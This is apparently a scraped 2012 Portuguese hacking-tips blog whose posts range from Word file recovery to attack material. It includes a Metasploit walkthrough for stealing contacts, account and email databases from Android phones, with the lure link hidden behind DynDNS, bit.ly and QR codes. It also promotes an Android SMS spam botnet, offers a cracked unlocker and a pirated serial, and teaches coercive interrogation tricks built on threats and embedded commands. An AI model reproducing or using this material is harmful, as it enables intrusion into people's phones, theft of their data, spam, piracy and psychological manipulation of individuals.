6.Bumerangue psicológico: Com esta técnica, você diz à pessoa que ela fez algo bom, e não mau. Assim, ela ficará, completamente livre para lhe dizer toda a verdade. Exemplo de uso:
Suspeita:Você suspeita que fulano (a) está roubando sua empresa.
Pergunta incorreta:"Fulano (a), você anda me roubando?"
Pergunta correta:"Ei, Fulano (a)! Acho que podemos nos tornar sócios muito ricos! Parece que você, ultimamente, tem 'passado à perna' em mim, mas está tudo bem. Nós podemos trabalhar juntos, seu (sua) espertinho (a)! Me conte mais sobre suas incríveis técnicas... Quero aprender tudo!" Você quer aparentar que está contente por saber o que a pessoa está fazendo. Ela não terá saída e vai se abrir para você.

Outro exemplo: (Utilizado em entrevistas para emprego)
Suspeita: Você suspeita que o candidato à vaga oferecida mentiu sobre as informações em seu currículo.
Pergunta incorreta:"Fulano (a), você andou colocando informações falsas em seu currículo?"
Pergunta correta:"Fulano (a), nós dois sabemos que todo mundo inventa um pouco sobre seu currículo. Pessoalmente, acho que isso demonstra coragem, porque a pessoa não tem medo de assumir novas responsabilidades. Me diga, quais partes em que você foi mais criativo no seu currículo?"


Técnicas avançadas para revelar a verdade
Os truques dos profissionais.
As técnicas abaixo devem ser usadas caso você esteja muito desconfiado da pessoa e ela se recusa a confessar.

1.Céu e inferno:
Esta técnica cria uma espécie de fobia na pessoa e a única saída é confessar a verdade para você. Aqui usamos as forças que moldam o comportamento humano: Dor e o Prazer nos seus limites para nos revelar a verdade. Exemplo de uso:
Se você acha que sua colega de trabalho está roubando o material de escritório da empresa. Você falaria: "Fulana, já sei da verdade. Sei também que você já Esta técnica cria uma espécie de fobia na pessoa e a única saída é confessar a verdade para você. Aqui usamos as forças que moldam o comportamento humano: Dor e o Prazer nos seus limites para nos revelar a verdade. Exemplo de uso:
Se você acha que sua colega de trabalho está roubando o material de escritório da empresa. Você falaria: "Fulana, já sei da verdade. Sei também que você já está se arrependendo de ter feito isso. Podemos resolver isso agora. Você pode me contar tudo e esquecemos isso para sempre. Ninguém mais ficará sabendo e você continuará no seu emprego. Mas, pode escolher um caminho mais doloroso: Posso ir até nosso chefe e falar para ele. Você sabe que isso seria demissão na certa, não é? Além do mais sua imagem ficaria suja. Imagina todos seus colegas comentando sobre o que você fez? Portanto, para o seu bem, me confesse agora e terminamos com isso de uma vez por todas". Se vincularmos dor intensa e insuportável à idéia de mentir e prazer imediato à idéia de falar a verdade, ela só terá uma saída: falar a verdade!

2.Curto circuito
Fulano (a). Eu não quero que você diga nada, a menos que, realmente, queira. E entendo que você já esqueceu o que havia pensado em querer, não é? Se estiver pensando consigo mesmo algo como... eu quero dizer à você, então simplesmente... diga ... Quando perceber que... esta é a decisão certa...você... irá me dizer a verdade... agora!
Importante:
•Antes e depois do comando - que está em negrito - você deve dar uma pausa (...)
•Ao dar o comando, aumente um pouco a voz e utilize uma tonalidade descendente.
•Gesticule com as mãos ao dizer o comando.
Você também pode usar a técnica do curto circuito, com o intuito de apenas interromper a linha de raciocínio de uma pessoa. Utilize as frases abaixo quando quiser tomar o controle de uma conversa, ou temporariamente confundir a pessoa, enquanto você reúne seus próprios pensamentos. Abaixo você tem algumas frases que desenvolvi. Não esqueça de gesticular enquanto fala. Use com moderação. Se usar várias delas seguidas, poderá provocar uma forte confusão mental na pessoa.

3.Criações do inconsciente:Esta técnica utiliza comandos implícitos de um modo totalmente novo. Você vai oferecer uma sugestão que cria uma ação perceptível. Exemplo de uso:
"Fulana, eu não estou dizendo que você deverá ...enrijecer seu corpo... se ...estiver mentindo" Se ela for mesmo culpada, o inconsciente se encarregará de dar uma resposta.

FONTE : planetavirtuall

quinta-feira, 22 de novembro de 2012

Dc Unlocker + Crack

Para quem ainda não conhece, o DC Unlocker é o melhor programa para desbloquear celulares e modens via hardware (USB) que existe. Disponibilizo aqui, uma versão crackeada. Para instalar:
  1. Primeiro você deverá baixar o DC, pelo link do site oficial. clique aqui.
  2. Após baixar o zip, quando abri-lo você encontrará o arquivo dc-unlocker_client-1.00.0597_2.exe.
  3. Basta instalá-lo.
CRACK


SENHA: ghufran

quarta-feira, 21 de novembro de 2012

Recuperar dados de documentos do Word


Existem duas situações quando falamos de recuperar arquivos do Word. Uma é quando você tem o arquivo corrompido em mãos e deseja reparar o arquivo para obter a informação que está contida nele. O segundo caso, é quando você esta escrevendo no Word e, por algum motivo, fechou o editor e perdeu o texto escrito.

Logo mais abaixo mostro dicas de como você pode reaver seu texto em cada caso.

1- Como recuperar arquivos corrompidos do Word

Uma forma de extrair o texto do seu arquivo corrompido, é usando uma ferramenta que já existe no Word. Outro jeito é usando programa de terceiros.

1.1 – Usando a própria ferramenta do Word
Os documentos do Word são gravados em formato binário, mas a informação principal fica mesmo é em formato texto. Por este motivo, o Word tem uma ferramenta chamada: “Recover Text from Any File” que extrai o texto de qualquer arquivo (não só de .docs!!!).

Então, se você recuperar um arquivo .doc que está dando problemas para abrir no Word, você pode usar esta ferramenta para poder extrair o texto do .doc danificado. Só lembre-se que a formatação, as imagens etc… não serão recuperados.

Para usar a ferramenta é muito simples:


  • No Microsoft Office Word 2007, clique no botão Microsoft Office, e depois clique em Abrir.
  • No Microsoft Office Word 2003 ou 2002, clique em Abrir no menuArquivo.
  • Na caixa “Arquivos do Tipo”, clique em “Recuperar texto de qualquer arquivo (*,*)”.
  • Selecione o documento que você desejar para recuperar o texto.
  • Clique em Abrir.
1.2- Usando programa de terceiros
O programa que eu indico é o WordRepair. Ele é fácil de usar, mas este programa também não preserva a formatação original do arquivo. Ele só vai extrair o texto.


Tudo o que você tem que fazer é clicar em “Repair/Open” e depois salvar o texto em um arquivo .rtf.


Depois você pode abrir o .rtf no Word para visualizar o texto.


2- Como recuperar arquivos após o Word ser fechado

O Word salva por padrão uma cópia, de dez em dez minutos, do arquivo que vocês está escrevendo. Ele faz isso para que caso o sistema tenha alguma pane, o usuário consiga continuar o trabalho de onde parou.

Em caso de pane a recuperação é automática. Mas há casos em que a pessoa fecha o editor e esquece de salvar o documento. Quando vai abrir o arquivo maos tarde, percebe que não tem mais nada. Se essa é sua situação, você pode tentar o seguinte:


1.Clique em Iniciar e em Pesquisar.
2.Clique em Todos os arquivos e pastas em Assistente de busca à esquerda no Windows Explorer.
3.Na caixa Todo ou parte do nome do arquivo:, digite *.ASD.
4.Na caixa Examinar, clique em Meu computador.
5.Clique em Pesquisar.
Se encontrar arquivos com a extensão .asd, execute as seguintes etapas:
a.Inicie o Word.
b.Execute uma das seguintes ações:
No Word 2007, clique no Botão do Microsoft Office e em Abrir.
No Word 2003, clique em Abrir no menu Arquivo.
c.Na lista Arquivos do tipo, clique em Todos os arquivos *.*.
d.Localize e selecione o arquivo .asd.
e.Clique em Abrir.
f.Reinicie o computador.
g.Inicie o Word.


Se o Word encontrar o arquivo de AutoRecuperação, o painel de tarefas Recuperação de documentos é aberto no lado esquerdo da tela e o documento que está faltando é listado como nome do documento [Original] ou como nome do documento [Recuperado]. Se isto ocorrer, execute uma das seguintes ações:


No Word 2007, clique duas vezes no arquivo no painel de tarefasRecuperação de documentos, clique no Botão Microsoft Office, emSalvar como e salve o documento como um arquivo .docx.
No Word 2003, clique duas vezes no arquivo no painel de tarefasRecuperação de documentos, clique em Salvar como no menu Arquivo e salve o documento como um arquivo .doc.


Você também pode fazer uma busca por arquivos *.ASD com o programa de recuperação de dados “PCI File Recovery“, caso não consiga achar o seu arquivo usando os passos acima.

sábado, 17 de novembro de 2012

Wondershare PDF Password Remover v1.3.0.3 and Serial Key


PDF Password Remover é projetado para remover senhas e restrições de arquivos PDF. Basta pressionar o botão direito do mouse no arquivo PDF, selecione Decrypt with Wondershare PDF Password Remover a partir do menu de atalho, as restrições serão removidas em segundos. É fácil para você copiar, modificar ou imprimir os arquivos PDF depois da descriptografia.

TAMANHO: 4.77 MB
Arquivo TORRENT
Instalação
1- Descompacte os arquivos. 
2- Use o serial contido no zip para registrá-lo.
3-Use!

Lista dos melhores web proxys existentes


É certo que em algum momento de sua vida pessoal você precisará de um web proxy, seja para abrir um site bloqueado em sua empresa, extrair informações sigilosas sob anonimato ou até mesmo bloquear este proxy na black list de seu fire wall empresarial. Vou colocá-los na ordem de mais importantes para menos:

Lista 1 Lista 2
http://anonymouse.ws/
http://www.proxyking.net/
http://www.proxyking.net/
http://www.anonymousindex.com/
http://www.hidemyass.com/
http://www.proxy7.com/
http://www.proxyfoxy.com/
http://www.78y.net/
http://www.75i.net/
http://www.dzzt.com/
http://www.proxyguy.com/
http://www.proxyz.be/
http://www.proxyhero.com/
 http://www.proxydrop.com
http://www.proxydrop.net
http://www.proxydrop.biz
http://www.proxydrop.info
http://www.proxydrop.org
http://www.prx1.com/
http://www.ninjaproxy.com/
http://www.shadowsurf.com/
http://www.famous5.net/
http://www.no1proxy.com
http://www.theproxy.be
http://www.newproxy.be
http://www.smartproxy.net
http://www.proxyprince.com/
http://pimpmyip.com/
http://ohmyproxy.com/
http://www.unblockmyspace.com/
http://www.proxyforall.com/
http://www.myproxysurfer.com/
http://www.proxycat.com/
http://www.proxydetective.com/
http://www.indianproxy.com/
http://www.proxybrowsing.com/
http://www.proxypi.com/
http://www.proxyjet.com/
http://www.justhide.com/
http://www.anonymization.net/
http://www.guardster.com/
http://www.proxyweb.net/
http://webwarper.net/
http://www.megaproxy.com
http://www.amegaproxy.com
http://www.w3privacy.com/
http://www.anonymizer.ru/
http://www.the-cloak.com/
http://www.pureprivacy.com/
http://proxify.com/
http://www.urlencoded.com/
http://www.snoopblocker.com/
http://www.long999.com/
http://www.psurf.net/
http://www.phproxy.info/
http://www.proxy121.com/
http://www.bigate.com/cgi-bin/bigate/b/k/k/
http://www.userbeam.de
http://www.calcmaster.net
http://www.misterprivacy.com/begin_anonymous_surfing.htm
http://www.myshield.com
http://www.idzap.com
http://www.safegatetech.com
http://www.breiter.ch/
http://www.rrdb.org/rrdbproxy.php?l=en
http://proxy.decodes.biz/
http://proxy.mxds.ch/
http://www.spondoo.com/
http://search.sicomm.us/
http://schnarre-monika.celebrityblog.net/cache.cgi
http://filter2005.com/
http://www.kproxy.com/
http://www.websitereactor.org/cgi-bin/001/nph-.pl
http://www.goproxing.com/
http://anonycat.com/
http://www.spynot.com/
http://www.merletn.org/anonymizer
http://www.cgi-proxy.net/
http://www.proxymouse.com/
http://www.theunblocker.tk/
http://www.betaproxy.com/
http://www.letsproxy.com/
http://www.freeproxysurf.info/
http://www.mysticproxy.com/
http://www.proxywave.com/
http://www.vtunnel.com/
http://www.proxysnail.com/

http://www.freeproxy.ca/
http://basic.3proxy.com/
http://www.privatebrowsing.com/
http://www.hackingtruths.org/proxy
http://xanproxy.be/ http://www.ipsecret.com/
http://www.proxyanon.com/
 http://www.anonproxy.info/ http://www.proxysafe.com/ http://www.strongproxy.com/ http://www.boredatschool.net/ http://www.ukproxy.com/ http://www.simpleproxy.com/ http://www.phproxy.org/ http://surfonym.com/ http://geoepker.hu/freeproxy/
http://www.browseatwork.com/ http://www.ipblocker.info/ http://www.boredatwork.info/
http://www.anonymousurfing.info/
http://www.browsingwork.com/ http://www.freeproxyserver.org/ http://www.browseany.com/ http://www.browsesecurely.com/
http://IEproxy.com/ http://www.sneak3.po.gs/ http://www.proxytastic.com/
http://www.freewebproxy.org/ http://www.thecgiproxy.com/ http://www.hide-me.be/ http://www.anotherproxy.com/
http://www.proxy77.com/
http://www.surf-anon.com/
http://www.free-proxy.info/
http://www.theproxysite.info/
http://www.proxyify.info/ http://www.concealme.com/ http://browseschool.info/ http://browsework.info/
http://browsingschool.info/
http://browsingwork.info/
http://browsingschool.com/
http://www.proxyindex.com/
http://www.gobyproxy.com/
http://www.proxifyme.com/
http://www.proxyghost.com/
http://www.spysurfing.com/
http://www.unblockthis.com/
http://www.proxyserver7.com/
http://www.daveproxy.co.uk/
http://www.tntproxy.com/
http://www.neoproxy.net/
http://www.bypassbrowser.com/
http://www.procksie.com/
http://www.httproxy.com/ http://www.cgiproxy.info/ http://www.silentsurf.com/cgi-bin/nph-index.cgi
http://www.proxy-sock.com/
http://www.proxygeek.com/
http://www.datadefense.org/
http://www.hideyour.info/
http://www.howto.pro/
http://www.collegeproxy.com/
http://www.demonproxy.com/
http://www.satanproxy.com/
http://www.hidingyou.com/
http://www.intelliproxy.com/
http://www.fireprox.com/
http://www.h0h0h0.com/firewall/
http://www.katedrala.cz/
http://www.browseatwork.net/
http://www.2255.info/ http://www.vproxy.be/ http://www.boxproxy.com/
http://www.nopimps.com/ http://www.fsurf.com/ http://www.proxylord.com/
http://roachhost.com/hp/
http://www.freepr0xy.com/
http://www.proxypop.com/ http://proxy.winidn.com/
http://www.cloax.net/
http://www.proxy247.com/
http://www.traceless.com/
http://www.siatec.net/proxyanonymizer
http://www.stealth-ip.net/
http://www.proxywhip.com http://www.proxy-surf.net/
http://www.videoeditors.info/proxy/
http://www.blockmy.info/
http://www.proxychatroom.com/
http://www.teenpropy.com/
http://www.totalupload.com/surf/
http://www.proxene.com/
http://www.fileshack.us/proxy.php
http://www.cloaker.ca/
http://www.proxified.net/ http://www.mrreid.net

terça-feira, 13 de novembro de 2012

Como desligar o seu computador com telefone celular - Por E-Mail


Usando este método, um usuário pode desligar, reiniciar, hibernar e etc, seu computador, basta enviar um e-mail de seu telefone.

Para fazer isso, tudo o que você precisa é o Microsoft Outlook, que deve vir com o Microsoft Office, o que a maioria das pessoas tem. Isto terá de ser no computador que gostaria que desligasse.

Então, essa é a forma como você fará isso:


Primeiro, você precisa dos arquivos em lote para executar o desligamento, Hibernate, etc. Caso saiba escrever não é necessário baixar, caso nao você pode baixá-lo aqui.

Você deve extrair o arquivo para a unidade C: ,ficando assim : C:\sms_functionsshutdown.bat (Importante esta é uma obrigação, o caminho deve ser exato), ou você pode modificar a regra, uma vez de importá-lo para apontar para o novo destino, é a sua chamada. Mas recomendo deixar com é descrito a cima.

Abra o Microsoft Outlook. Certifique-se de que você já tenha configurado para o seu e-mail. Agora teremos que fazer com que o Outlook verifica sua caixa de entrada a cada minuto (1 minuto para o tempo de teste, pode ser aumentado de acordo com o desejado). Vá em Ferramentas: Opções.

Em seguida, clique na guia Configuração de correio, e depois, no botão Enviar/Receber.

Certifique-se de que o Agendador envio/recebimento automático está marcada, e defina o número de minutos intervalo. Agora você pode fechar todas as caixas de diálogo.

Agora vá para Ferramentas: Regras e Alertas ... Em seguida, clique no botão de opções no canto superior direito e pressione o botão Importar Regras.

Agora selecione o arquivo shutdown.rwz que foi encontrado no arquivo zip chamado sms_functions que você baixou.

Agora, quando você envia uma mensagem de seu celular para seu endereço de e-mail com o assunto smsshutdown%%, o computador será desligado.




Você também pode fazer a sua própria regra, de modo que você pode usar seu próprio arquivo de lote, e pode especificar a frase que você deseja acionar a ação.



domingo, 11 de novembro de 2012

Achando senhas padrões de modems

Bom, essa é uma pequena ferramenta que serve para muitos que trabalham com redes ou até mesmo um usuário comum que precisa acessar o painel de seu modem, pois é, estava com esse problema com alguns clientes e fui buscar no nosso supremo Google as senha padrões de modems, foi-se necessário alguns minutos do meu tempo, com vários links falhos até que encontrei um em outros cantos da internet e que me deu o suporte necessário para a minha necessidade, espero que possa lhe ajudar. O link segue a baixo, basta escolher o modelo e logo em seguida ele lhe mostrará as possíveis senhas padrões.


Link : ACESSAR

Fazendo Botnet de SMS no Smartphone (Android)

Olá a todos. Desta vez eu trago um artigo muito interessante que eu encontrei, é um botnet para celulares com Android, a função principal é a de infectar muitos celulares, e depois por comandos, realiza alguma ação. Neste caso é enviar sms.


Uma botnet é uma coleção de agentes de software ou bots que executam autonomamente e automaticamente. O termo é geralmente associado com o uso de software malicioso, mas também pode se referir a uma rede de computadores utilizando software de computação distribuída.





O comando para execução é:
BOT: SPAM {numero para o spam} {mensagem}

Ex : BOT: SPAM {7399654468} {Olá! Visite nosso Blog! hchost.blogspot.com}



DOWNLOAD
Demostração em Vídeo
Documentação ( Tutorial PDF - INGLÊS )
Release



quinta-feira, 8 de novembro de 2012

Hackeando e obtendo informações do SmartPhones com Android no Metasploit

Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
hackear o androif
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca  que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos  o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .

Vamos começar!

Roubar arquivos android_htmlfileprovider

A primeira coisa é começar o msfconsole no terminal do backtrack


  1. root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para  o nosso objetivo:
  1. msf > use gather/android_htmlfileprovider
  2. msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
  1. msf auxiliary(android_htmlfileprovider) > show options
  • FILES (arquivos do Android que queremos roubar) 
  • SRVHOST (IP local que estará a espera de conexões)
  • SRVPORT (A porta que estará a espera de conexões)
  • SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
  • SSLVersion (Se tiver ativado a opção acima, indique a versão do  SSL )
  • URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que por padrão é uma seqüência aleatória, a vítima será direcionado para a raiz do servidor, faça com a baixo:

  1. msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
  2. SRVPORT => 80
  3. msf auxiliary(android_htmlfileprovider) > set URIPATH /
  4. URIPATH => /
Agora só podemos começar a façanha usando o comando run, e esperar algum dispositivo conectar ao nosso IP ouvinte.

Veja a Imagem abaixo:

Exploit Executado - CLIQUE PARA AMPLIAR
Usando DynDNS para aumentar o alcance

Como dizemos, se fizermos esse ataque só para redes locais (LAN), como smartphones não costumam passar muito tempo conectado a uma rede Wi-Fi que estamos interessados. Mas é possível aumentar essa exploração, para fazer isso, neste caso vamos usar o DynDNS, que é um serviço que fornece o endereçamento dinâmico de domínio tipo site.dyndns *. Org .

Temos que ir no site da  http://dyn.com/ e criar uma conta. Após isso, pode registrar o domínio que escolhemos. Após este iria para as configurações do roteador e indicar o domínio, o nome de usuário e senha, como você pode ver (em outros roteadores pode ser diferente).

CLIQUE PARA AMPLIAR
Devo dizer que DynDNS é um serviço excelente. Depois de configurar o domínio DynDNS só precisa redirecionar corretamente no ip do roteador. Ou seja, no nosso caso, a vítima irá se conectar ao vidasconcurrentes.dyndns.org (na porta 80) e deve ser definida para ir para a porta IP em que ouvimos o exploit.

CLIQUE PARA AMPLIAR


Ofuscando o ataque com códigos QR e bit.ly

Temos tudo para o ataque,  teria que passar a url para as vítimas e esperar por ele para se conectar. O problema é que um estilo vidasconcurrentes.dyndns.org url pode ser bastante suspeito. Neste caso, use um encurtador de URL, usaremos o  bit.ly  ( pode se encontrar vários). 

Finalmente, se quisermos um ataque mais viral, podemos criar um código QR (http://qrcode.kaywa.com/) usando o link  que o encurtador de link do  bit.ly nos deu  , sendo ainda mais difícil de detectar.
O QR vai estar camuflado com o link do Bit, veja o EX :  http://bit.ly/q9wRCW , que redireciona para o domínio criado no DynDNS, o vidasconcurrentes.dyndns.org, que estará com o exploit a escuta.. Veja o Exemplo do QR.

CLIQUE PARA AMPLIAR

Tendo sucesso em sua invasão, basta usar a criatividade para explorar, alguns diretorios do android em especial estará listados a baixo:

Banco de Dados de Contatos

/data/data/com.android.providers.contacts/databases/contacts.db

Banco de Dados do Browser
/data/data/com.android.browser/databases/browser.db

Banco de Dados de Contas
/data/data/com.google.android.googleapps/databases/accounts.db

Banco de Dados de Geolocalização
/data/data/com.android.browser/gears/geolocation.db

Diretório de Banco de Dados do Telefone
/data/data/com.android.providers.telephony/databases/

Banco de Dados de historicos
/data/data/com.google.android.apps.maps/databases/search_history.db

Diretório de Banco de Dados de E-Mail
/data/data/com.google.android.providers.gmail/databases/


A maioria dos aplicativos tem um diretório de bancos de dados, pode-se obter o suficiente de  informação.

Baixar Windows Essentials 2012(Wave 5) - Instalador off line

MSN 2012

Vos deixo aqui os links para download o instalador offline do antigo Windows Live Essentials, agora Windows Essentials. Para instalá-lo, você precisará estar em um sistema mais atual da MS, sendo ele Win7 ou Win8. Divirtam-se:

LanguagesLang iDLinks
Arabicarhttp://g.live.com/1rewlive5-all/ar/wlsetup-all.exe
Bulgarianbghttp://g.live.com/1rewlive5-all/bg/wlsetup-all.exe
Catalancahttp://g.live.com/1rewlive5-all/ca/wlsetup-all.exe
Czechcshttp://g.live.com/1rewlive5-all/cs/wlsetup-all.exe
Danishdahttp://g.live.com/1rewlive5-all/da/wlsetup-all.exe
Germandehttp://g.live.com/1rewlive5-all/de/wlsetup-all.exe
Greekelhttp://g.live.com/1rewlive5-all/el/wlsetup-all.exe
Englishenhttp://g.live.com/1rewlive5-all/en/wlsetup-all.exe
Spanisheshttp://g.live.com/1rewlive5-all/es/wlsetup-all.exe
Estonianethttp://g.live.com/1rewlive5-all/et/wlsetup-all.exe
Basqueeuhttp://g.live.com/1rewlive5-all/eu/wlsetup-all.exe
Finnishfihttp://g.live.com/1rewlive5-all/fi/wlsetup-all.exe
Frenchfrhttp://g.live.com/1rewlive5-all/fr/wlsetup-all.exe
Gujaratiguhttp://g.live.com/1rewlive5-all/gu/wlsetup-all.exe
Hebrewhehttp://g.live.com/1rewlive5-all/he/wlsetup-all.exe
Hindihihttp://g.live.com/1rewlive5-all/hi/wlsetup-all.exe
Croatianhrhttp://g.live.com/1rewlive5-all/hr/wlsetup-all.exe
Hungarianhuhttp://g.live.com/1rewlive5-all/hu/wlsetup-all.exe
Indonesianidhttp://g.live.com/1rewlive5-all/id/wlsetup-all.exe
Italianithttp://g.live.com/1rewlive5-all/it/wlsetup-all.exe
Japanesejahttp://g.live.com/1rewlive5-all/ja/wlsetup-all.exe
Kannadaknhttp://g.live.com/1rewlive5-all/kn/wlsetup-all.exe
Koreankohttp://g.live.com/1rewlive5-all/ko/wlsetup-all.exe
Lithuanianlthttp://g.live.com/1rewlive5-all/lt/wlsetup-all.exe
Latvianlvhttp://g.live.com/1rewlive5-all/lv/wlsetup-all.exe
Malayalamml-inhttp://g.live.com/1rewlive5-all/ml-in/wlsetup-all.exe
Marathimrhttp://g.live.com/1rewlive5-all/mr/wlsetup-all.exe
Malaymshttp://g.live.com/1rewlive5-all/ms/wlsetup-all.exe
Dutchnlhttp://g.live.com/1rewlive5-all/nl/wlsetup-all.exe
Norwegian (Bokmal)nohttp://g.live.com/1rewlive5-all/no/wlsetup-all.exe
Polishplhttp://g.live.com/1rewlive5-all/pl/wlsetup-all.exe
Portuguese (Brazil)pt-brhttp://g.live.com/1rewlive5-all/pt-br/wlsetup-all.exe
Portuguese (Portugal)pt-pthttp://g.live.com/1rewlive5-all/pt-pt/wlsetup-all.exe
Romanianrohttp://g.live.com/1rewlive5-all/ro/wlsetup-all.exe
Russianruhttp://g.live.com/1rewlive5-all/ru/wlsetup-all.exe
Slovakskhttp://g.live.com/1rewlive5-all/sk/wlsetup-all.exe
Slovenianslhttp://g.live.com/1rewlive5-all/sl/wlsetup-all.exe
Serbian-Cyrillicsr-cyrl-cshttp://g.live.com/1rewlive5-all/sr-cyrl-cs/wlsetup-all.exe
Serbian-Latinsr-latn-cshttp://g.live.com/1rewlive5-all/sr-latn-cs/wlsetup-all.exe
Swedishsvhttp://g.live.com/1rewlive5-all/sv/wlsetup-all.exe
Tamiltahttp://g.live.com/1rewlive5-all/ta/wlsetup-all.exe
Telugutehttp://g.live.com/1rewlive5-all/te/wlsetup-all.exe
Thaithhttp://g.live.com/1rewlive5-all/th/wlsetup-all.exe
Turkishtrhttp://g.live.com/1rewlive5-all/tr/wlsetup-all.exe
Ukrainianukhttp://g.live.com/1rewlive5-all/uk/wlsetup-all.exe
Vietnamesevihttp://g.live.com/1rewlive5-all/vi/wlsetup-all.exe
Chinese (Simplified)zh-cnhttp://g.live.com/1rewlive5-all/zh-cn/wlsetup-all.exe
Chinese (Traditional)zh-twhttp://g.live.com/1rewlive5-all/zh-tw/wlsetup-all.exe